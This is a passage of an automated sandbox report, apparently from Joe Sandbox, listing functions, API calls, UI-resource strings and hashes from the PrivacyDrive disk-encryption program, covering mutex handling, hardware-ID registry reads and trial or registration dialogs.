                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CriticalSection$EnterLeave$ByteCharMultiWide
                                • String ID: IMG_CHECKED$IMG_GLOSS_TEXTURE$IMG_PAGEBUTTON_DOWN$IMG_PAGEBUTTON_UP$IMG_POPUP$IMG_SHADOW_BOTTOM$IMG_SHADOW_LB$IMG_SHADOW_LEFT$IMG_SHADOW_LT$IMG_SHADOW_RB$IMG_SHADOW_RIGHT$IMG_SHADOW_RT$IMG_SHADOW_TOP$IMG_TITLE$Menu$Menu\Shadow$STANDARD$STANDARD||TYPE_1
                                • API String ID: 904232820-4271733006
                                • Opcode ID: fdc82d2778dd63787b58c29ba190d88ef52f95139b13abb2df8026b8eb4a0fd9
                                • Instruction ID: d1ca696b88e7c6926439ed5789eab024851eeebd8278ddf3fbe08148c7662b1b
                                • Opcode Fuzzy Hash: fdc82d2778dd63787b58c29ba190d88ef52f95139b13abb2df8026b8eb4a0fd9
                                • Instruction Fuzzy Hash: BC4166703C071267EA0576325D03FAA69597F90B45F08801FBA1DBA1C2EFD8E90096BD
                                Function 0040FA00 Relevance: 35.2, APIs: 14, Strings: 6, Instructions: 216filesleepsynchronizationCOMMON
                                Download Yara Rule
                                APIs
                                • CreateMutexW.KERNEL32(00000000,00000001,_Privacy Drive,7563D392), ref: 0040FA41
                                • GetLastError.KERNEL32 ref: 0040FA56
                                • CloseHandle.KERNEL32 ref: 0040FA6D
                                • OpenMutexW.KERNEL32(00100000,00000000,_Privacy Drive,?,?,00000000), ref: 0040FADE
                                • CloseHandle.KERNEL32(00000000), ref: 0040FAED
                                • Sleep.KERNEL32(00000064), ref: 0040FB11
                                • GetCurrentProcessId.KERNEL32 ref: 0040FB48
                                • CreateFileMappingW.KERNEL32(000000FF,00000000,00000004,00000000,?,?,00000000), ref: 0040FBA2
                                • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000,?,?,00000000), ref: 0040FBBB
                                • FlushViewOfFile.KERNEL32(00000000,?,?,?,00000000), ref: 0040FBE0
                                • GetCurrentProcessId.KERNEL32(?,?,00000000), ref: 0040FBE6
                                • SendMessageW.USER32(00000000,00000111,000004DB,00000000), ref: 0040FBF8
                                • CloseHandle.KERNEL32(?,?,?,00000000), ref: 0040FC01
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CloseFileHandle$CreateCurrentMutexProcessView$ErrorFlushLastMappingMessageOpenSendSleep
                                • String ID: !@$%s_Shared_%u$Privacy Drive Std Dialog Activation$Privacy Drive Std Main Frame$Rerun$_Privacy Drive
                                • API String ID: 119523191-1318878198
                                • Opcode ID: e0bf2834d42df8286364d1d6106b5b8930e964d14234c5d4bab024d32033fe58
                                • Instruction ID: a30ce1052aed84a7f83e80f23250de81ee4dd0901ec1c01045540fd42c29c870
                                • Opcode Fuzzy Hash: e0bf2834d42df8286364d1d6106b5b8930e964d14234c5d4bab024d32033fe58
                                • Instruction Fuzzy Hash: 9071C331A00308ABEB10EBA5DD16BAE77B4FB48311F140539FA01F72D1DB78A804CBA4
                                Function 004A48F0 Relevance: 34.7, APIs: 6, Strings: 17, Instructions: 196COMMON
                                Download Yara Rule
                                APIs
                                • EnterCriticalSection.KERNEL32(005BDCE4,?,?,?,004A4BDC,?,?,?,00404A2A,?,00002712,00000000), ref: 004A4900
                                • LeaveCriticalSection.KERNEL32(005BDCE4,?,00404A2A,?,00002712,00000000), ref: 004A4918
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Button,?,STANDARD,?,00404A2A,?,00002712,00000000), ref: 004A4945
                                • LeaveCriticalSection.KERNEL32(005BDCE4,?,00404A2A,?,00002712,00000000), ref: 004A4957
                                  • Part of subcall function 004C24A0: WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?, v,00000000,00000000,00000000,?,00000000,?,00000003,?,00583B28,00000000), ref: 004C2699
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Button,?,STANDARD,?,00404A2A,?,00002712,00000000), ref: 004A4984
                                • LeaveCriticalSection.KERNEL32(005BDCE4,?,00404A2A,?,00002712,00000000), ref: 004A4996
                                  • Part of subcall function 00424910: EnterCriticalSection.KERNEL32(005BDCE4,?,?,?,004A01A9,Dialog\Button,BASE_DIALOG|CLOSE,0000000C,INACTIVATE_TITLE_TEXT,0000000B,INACTIVATE_TITLE_END,0000000A,INACTIVATE_TITLE_BEGIN,00000009,ACTIVATE_TITLE_END,00000008), ref: 0042491C
                                  • Part of subcall function 00424910: LeaveCriticalSection.KERNEL32(005BDCE4,?,004A01A9,Dialog\Button,BASE_DIALOG|CLOSE,0000000C,INACTIVATE_TITLE_TEXT,0000000B,INACTIVATE_TITLE_END,0000000A,INACTIVATE_TITLE_BEGIN,00000009,ACTIVATE_TITLE_END,00000008,ACTIVATE_TITLE_BEGIN,00000007), ref: 0042492F
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CriticalSection$EnterLeave$ByteCharMultiWide
                                • String ID: Button$Button\State$CR_DISABLED_BACKGROUND$CR_DISABLED_BORDER$CR_HIT_BACKGROUND$CR_HIT_BORDER$CR_NORMAL_BACKGROUND$CR_NORMAL_BORDER$CR_PUSH_BACKGROUND$CR_PUSH_BORDER$PM_FILLET$PM_HEIGHT$STANDARD$STANDARD|DISABLED$STANDARD|HIT$STANDARD|NORMAL$STANDARD|PUSH
                                • API String ID: 904232820-70401535
                                • Opcode ID: 9c2030392b6330b3e05bab43e78cbad26a7cb263d08b6152366fde4aca2a4a79
                                • Instruction ID: 45afea047e48c39cfd3e14ad7c1c7b5623383e324d3ba7e84717a9c0e15e9774
                                • Opcode Fuzzy Hash: 9c2030392b6330b3e05bab43e78cbad26a7cb263d08b6152366fde4aca2a4a79
                                • Instruction Fuzzy Hash: 7F51813078031162DA55B232AD87F6F19857FD5B45F44042EBA5AA72C2FEE9E802C73D
                                Function 00444430 Relevance: 33.2, APIs: 6, Strings: 16, Instructions: 150COMMON
                                Download Yara Rule
                                APIs
                                • EnterCriticalSection.KERNEL32(005BDCE4), ref: 00444440
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 00444458
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,CREATING_VOLUME), ref: 00444485
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 00444497
                                  • Part of subcall function 004C24A0: WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?, v,00000000,00000000,00000000,?,00000000,?,00000003,?,00583B28,00000000), ref: 004C2699
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,CREATING_VOLUME), ref: 004444C4
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 004444D6
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CriticalSection$EnterLeave$ByteCharMultiWide
                                • String ID: CHECKBOX_CLOSE_X$CHECKBOX_CLOSE_Y$COMPLETED_Y$CREATING_VOLUME$Dialog$ELAPSED_TIMES_Y$FILENAME_X$FILENAME_Y$ICON_X$ICON_Y$PATH_X$PATH_Y$PROGRESS_BAR_X$PROGRESS_BAR_Y$REMAINING_TIMES_Y$SPEED_Y
                                • API String ID: 904232820-2618109599
                                • Opcode ID: 1563389ca7e6bff05b978fe7bd61b38159bc0f150c51b316783dfa8b6d7ca170
                                • Instruction ID: 894f6084bdbb1a62b58e92d0cb2c024dc5b6c8091a70dcc14a00fb35b55d1dfc
                                • Opcode Fuzzy Hash: 1563389ca7e6bff05b978fe7bd61b38159bc0f150c51b316783dfa8b6d7ca170
                                • Instruction Fuzzy Hash: 51419730380B027AFA4463329D23F7B1A5ABB51F45F41402BBA05E62C1EFDCE911969D
                                Function 00432610 Relevance: 33.1, APIs: 6, Strings: 16, Instructions: 146COMMON
                                Download Yara Rule
                                APIs
                                • EnterCriticalSection.KERNEL32(005BDCE4), ref: 00432620
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 00432638
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,REGISTRATION_REMINDER_MINI), ref: 00432665
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 00432677
                                  • Part of subcall function 004C24A0: WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?, v,00000000,00000000,00000000,?,00000000,?,00000003,?,00583B28,00000000), ref: 004C2699
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,REGISTRATION_REMINDER_MINI), ref: 004326A4
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 004326B6
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CriticalSection$EnterLeave$ByteCharMultiWide
                                • String ID: CR_BACKGROUND_BEGIN$CR_BACKGROUND_END$CR_BORDER_BACKGROUND$CR_BOTTOM_BACKGROUND_BEGIN$CR_BOTTOM_BACKGROUND_END$CR_GENERAL$CR_TITLE$CR_WARNING$Dialog$IMG_ARROW$IMG_ICON$PM_ARROW_X$PM_BORDER$PM_FILLET$PM_FILLET2$REGISTRATION_REMINDER_MINI
                                • API String ID: 904232820-3547206135
                                • Opcode ID: b58ab82fcadba15aae9994f977523bea4edf7cb2760220261414fbd3c49184fa
                                • Instruction ID: 0a878cd1433689f4d0d3299847657b5edb1d1d45717a6218fa825460d51ef61a
                                • Opcode Fuzzy Hash: b58ab82fcadba15aae9994f977523bea4edf7cb2760220261414fbd3c49184fa
                                • Instruction Fuzzy Hash: 1A416530380B0276DA18B6729D12FA77A557B04F4AF44523BB618E61C2FFD8F815CE59
                                Function 0045C820 Relevance: 31.8, APIs: 10, Strings: 8, Instructions: 283registryfileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0045DCD0: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 0045DD0E
                                • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards,00000000,00020019,?,7563D392,005BE234,75A8EB20,005783F0), ref: 0045C89E
                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000019), ref: 0045C8C1
                                • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020019,?,00000000,-00000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards\,0000003A), ref: 0045C974
                                • RegQueryValueExW.ADVAPI32(?,ServiceName,00000000,00000001,?,0045C671), ref: 0045C9AF
                                • RegCloseKey.ADVAPI32(?), ref: 0045CA1D
                                • RegEnumKeyW.ADVAPI32(?,00000001,00000000,00000019), ref: 0045CA64
                                • RegCloseKey.ADVAPI32(?), ref: 0045CA74
                                • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,00000000,00000000,75A8EB34,00000000,000000FF,\\.\,00000004), ref: 0045CB1B
                                • DeviceIoControl.KERNEL32(00000000,00170002,01010102,00000004,0045C671,00000006,?,00000000), ref: 0045CB58
                                • CloseHandle.KERNEL32(00000000), ref: 0045CB5F
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Close$EnumOpen$Concurrency::details::_Concurrent_queue_base_v4::_ControlCreateDeviceFileHandleInternal_throw_exceptionQueryValue
                                • String ID: 4[P[$4[P[$HardwareID.cpp$SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards$SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards\$ServiceName$\\.\$d
                                • API String ID: 3970217950-1793246607
                                • Opcode ID: 3fd7bc30e3ad3b9f7a86cf77d6027eeaf0c2f872544d776e4dc095a49a7457a0
                                • Instruction ID: dbc346add66269ab6cd4fd60308b7b0865e9ffdfadef4d1509db4847bad84fb0
                                • Opcode Fuzzy Hash: 3fd7bc30e3ad3b9f7a86cf77d6027eeaf0c2f872544d776e4dc095a49a7457a0
                                • Instruction Fuzzy Hash: 82C139719002299FDB61DF54CC89BDEBBB4BF08709F00409AE909A7291EB746A88CF55
                                Function 00447140 Relevance: 31.6, APIs: 6, Strings: 15, Instructions: 145COMMON
                                Download Yara Rule
                                APIs
                                • EnterCriticalSection.KERNEL32(005BDCE4), ref: 00447150
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 00447168
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,CHANGE_PASSWORD), ref: 00447195
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 004471A7
                                  • Part of subcall function 004C24A0: WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?, v,00000000,00000000,00000000,?,00000000,?,00000003,?,00583B28,00000000), ref: 004C2699
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,CHANGE_PASSWORD), ref: 004471D4
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 004471E6
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CriticalSection$EnterLeave$ByteCharMultiWide
                                • String ID: CHANGE_PASSWORD$Dialog$PM_EDIT_HEIGHT$PM_EDIT_LEFT$PM_EDIT_NEW_PASSWORD_1_X$PM_EDIT_NEW_PASSWORD_1_Y$PM_EDIT_NEW_PASSWORD_2_X$PM_EDIT_NEW_PASSWORD_2_Y$PM_EDIT_PASSWORD_X$PM_EDIT_PASSWORD_Y$PM_EDIT_TOP$PM_EDIT_WIDTH$PM_EIDT_INTERVAL$PM_ICON_X$PM_ICON_Y
                                • API String ID: 904232820-2465005945
                                • Opcode ID: 3430bf9ee36cb6a63971e56141cead649e770664fe3d6e06a106b8383a58ca55
                                • Instruction ID: d6ba44327f6387490c6c5f3919e2e623994676edf6e9c8a4ed366ae526e773d0
                                • Opcode Fuzzy Hash: 3430bf9ee36cb6a63971e56141cead649e770664fe3d6e06a106b8383a58ca55
                                • Instruction Fuzzy Hash: EE41657038470266EA60BB328D16BBA19956B54F45F04002BBE46F62C1FFD8E901D2AD
                                Function 00404440 Relevance: 31.6, APIs: 6, Strings: 15, Instructions: 145COMMON
                                Download Yara Rule
                                APIs
                                • EnterCriticalSection.KERNEL32(005BDCE4), ref: 00404450
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 00404468
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,CHANGE_KEY_FILE), ref: 00404495
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 004044A7
                                  • Part of subcall function 004C24A0: WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?, v,00000000,00000000,00000000,?,00000000,?,00000003,?,00583B28,00000000), ref: 004C2699
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,CHANGE_KEY_FILE), ref: 004044D4
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 004044E6
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CriticalSection$EnterLeave$ByteCharMultiWide
                                • String ID: CHANGE_KEY_FILE$Dialog$PM_EDIT_HEIGHT$PM_EDIT_LEFT$PM_EDIT_NEW_PASSWORD_1_X$PM_EDIT_NEW_PASSWORD_1_Y$PM_EDIT_NEW_PASSWORD_2_X$PM_EDIT_NEW_PASSWORD_2_Y$PM_EDIT_PASSWORD_X$PM_EDIT_PASSWORD_Y$PM_EDIT_TOP$PM_EDIT_WIDTH$PM_EIDT_INTERVAL$PM_ICON_X$PM_ICON_Y
                                • API String ID: 904232820-2296903074
                                • Opcode ID: 35b27466a8b495ad65cc37f8dcaf438aa743d653b1952fa199469e3722628324
                                • Instruction ID: 60bedd108f03b1c2e1c50752b9538914c8de37de6d91beb2e3fc44abb839224a
                                • Opcode Fuzzy Hash: 35b27466a8b495ad65cc37f8dcaf438aa743d653b1952fa199469e3722628324
                                • Instruction Fuzzy Hash: C741457038074276EA50B722CD52F7A19956B91F4AF04043BBB47B72C1FEADE901866D
                                Function 004516E0 Relevance: 31.6, APIs: 3, Strings: 15, Instructions: 95COMMON
                                Download Yara Rule
                                APIs
                                • TryEnterCriticalSection.KERNEL32(005BDCCC), ref: 004516E8
                                • LeaveCriticalSection.KERNEL32(005BDCCC,Dialog,SETTINGS), ref: 0045170F
                                • LeaveCriticalSection.KERNEL32(005BDCCC,0000000B,BUTTON_APPLY,0000000A,BUTTON_CANCEL,00000009,BUTTON_OK,00000008,BUTTON_RESTORE,00000007,TABBUTTON_USER_INTERFACE,00000006,TABBUTTON_FILE_ASSOCIATION,00000005,TABBUTTON_HOTKEYS,00000004), ref: 00451814
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CriticalSection$Leave$Enter
                                • String ID: BUTTON_APPLY$BUTTON_CANCEL$BUTTON_OK$BUTTON_RESTORE$Dialog$PZ$SETTINGS$TABBUTTON_DISMOUNT$TABBUTTON_ENCRYPTION$TABBUTTON_FILE_ASSOCIATION$TABBUTTON_GENERAL$TABBUTTON_HOTKEYS$TABBUTTON_MOUNT$TABBUTTON_PRIVACY$TABBUTTON_USER_INTERFACE
                                • API String ID: 2978645861-2085767557
                                • Opcode ID: 8f730f8336e4edca7c593f181bb04b7661c1013c70494e6cf3742296e58b1598
                                • Instruction ID: dee03ef0cf6cbe1d92bb95a76faa4843bfbdc680406790e37bf0c27b90719b4a
                                • Opcode Fuzzy Hash: 8f730f8336e4edca7c593f181bb04b7661c1013c70494e6cf3742296e58b1598
                                • Instruction Fuzzy Hash: A5214C223C472522EA5A22362D5BB2F09492B0DF5AF24405ABF05AD2D3FFCDCD45D19D
                                Function 00432A30 Relevance: 30.1, APIs: 4, Strings: 13, Instructions: 326timeCOMMON
                                Download Yara Rule
                                APIs
                                • swprintf.LIBCMT ref: 00432B5F
                                • swprintf.LIBCMT ref: 00432C50
                                • GetLocalTime.KERNEL32(?,String,OFFICIAL_DAY,?,String,OFFICIAL_INFO,?,00000000,-00000002,Dialog,REGISTRATION_REMINDER_MINI,7563D392), ref: 00432D62
                                • swprintf.LIBCMT ref: 00432DAC
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: swprintf$LocalTime
                                • String ID: 4[$BUY_NOW$Dialog$LICENSE_KEY$LinkButton$OFFICIAL_DAY$OFFICIAL_INFO$REGISTRATION_REMINDER_MINI$RENEW$String$TRIAL_DAY$TRIAL_INFO$TRIAL_VERSION
                                • API String ID: 2228335886-1334633211
                                • Opcode ID: a6cb3c1c8df51b6505db229daea319b55717ec9df276fe106a36607346fda6e0
                                • Instruction ID: 77aa747300c8cc342f0f0a2b823a071e5553e3597c230ce8377dc00322d6cf8e
                                • Opcode Fuzzy Hash: a6cb3c1c8df51b6505db229daea319b55717ec9df276fe106a36607346fda6e0
                                • Instruction Fuzzy Hash: C7D1C371A00209AFDB14DFA4CD56BEEBBB8FF04304F04452AE415A7281EB78AA45CF95
